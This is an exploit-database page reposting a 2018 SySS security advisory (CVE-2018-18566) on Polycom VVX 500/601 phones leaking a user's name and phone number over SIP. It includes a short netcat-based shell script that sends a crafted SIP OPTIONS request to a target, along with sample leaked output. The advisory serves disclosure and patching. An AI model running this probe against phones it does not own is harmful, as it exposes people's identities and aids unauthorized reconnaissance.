0day.today - Ce-a mai mare baze de date de exploit-uri din lume.
![](/img/logo_green.jpg)
Folosim un singur domeniu DOMAIN_LINK
Dacă dorești să cumperi un exploit sau să platești pentru un serviciu, trebuie să cumperi Gold. Nu dormim să folosim site-ul pentru scopuri informatice negative (hacking), prin urmare orice tip de acțiune de hacking care poate afecta ilegal alți utilizatori sau pagini web la care nu ești proprietar va fi pedepsită cu blocarea contului permanentă incluzand distrugerea datelor tale care aparțin de cont.
Administrația acestui website folosește adresele oficiale de contact. Atenție la impostori!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Citiți [ acordul ]
- Citiți [ trimite ] reguli
- Vizitați [ Întrebări frecvente. ] pagină
- [ Înregistrare ] profil
- Obține [ GOLD ]
- Dacă dorești să [ vinzi ]
- Dacă dorești să [ cumperi ]
- Dacă ați pierdut [ cont-ul vizitați această pagină. ]
- Orice întrebări [ [email protected] ]
- Pagină de autorizare
- Pagină de Înregistrare
- Pagină de restaurare a unui cont
- Pagina FAQ
- Pagina de contact
- Regulamentul pentru post-uri
- Pagina de acorduri
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ne puteți contacta prin:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability
Autor
Risc
![](/img/risk/critlow_2.gif)
Nivel de securitate mediu
]0day-ID
Categorie
Data
CVE
Platformă
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability Product: VVX 500 / VVX 601 Manufacturer: Polycom Affected Version(s): <= 5.8.0.12848 Tested Version(s): 5.4.0.10182, 5.8.0.12848 Vulnerability Type: Information Exposure (CWE-200) Risk Level: Low Solution Status: Open Manufacturer Notification: 2018-08-29 Solution Date: 20??-??-?? Public Disclosure: 2018-10-23 CVE Reference: CVE-2018-18566 Authors of Advisory: Micha Borrmann (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: If a Polycom VVX 500/601 [1] is used with an on-premise installation with Skype for Business, the phone leaks the configured phone number and the name to unauthorized clients via SIP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The phone has a SIP service running by default on TCP port 5060. This service can be abused to leak information about the configuration of the phone. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Script getdatafrompolycom.sh #!/bin/sh # Micha Borrmann <[email protected]> OWNIP=192.168.100.102 if [ -z "$1" ] then echo "Please enter an IPv4 address as target" exit else TARGET=$1 fi echo 'OPTIONS sip:dummy SIP/2.0 Via: SIP/2.0/TCP '$OWNIP':5060 To: <sip:'$OWNIP':5060> From: <sip:127.0.0.1:5060> Call-ID: 1 CSeq: 1 OPTIONS Contact: <sip:127.0.0.1:5060> Accept: application/sdp Content-Length: 0 ' | recode ..ibmpc | netcat -w 1 $TARGET 5060 Start the script against a phone and see the result: $ ./getpolycom.sh 192.168.100.101 SIP/2.0 200 OK Via: SIP/2.0/TCP 192.168.100.102:5060 From: <sip:127.0.0.1:5060> To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE CSeq: 1 OPTIONS Call-ID: 1 Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd> Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER Supported: replaces,100rel User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848 Accept-Language: en P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234> Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml Accept-Encoding: identity Supported: 100rel,replaces,norefersub,sdp-anat Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001" Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install the new firmware which has disabled the SIP service by default. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-08-13: Detection of the vulnerability 2018-08-29: Vulnerability reported to manufacturer 2018-10-22: CVE number assigned 2018-10-23: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product web sites for the phones https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html [2] SySS Security Advisory SYSS-2018-028 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ # 0day.today [2024-07-02] #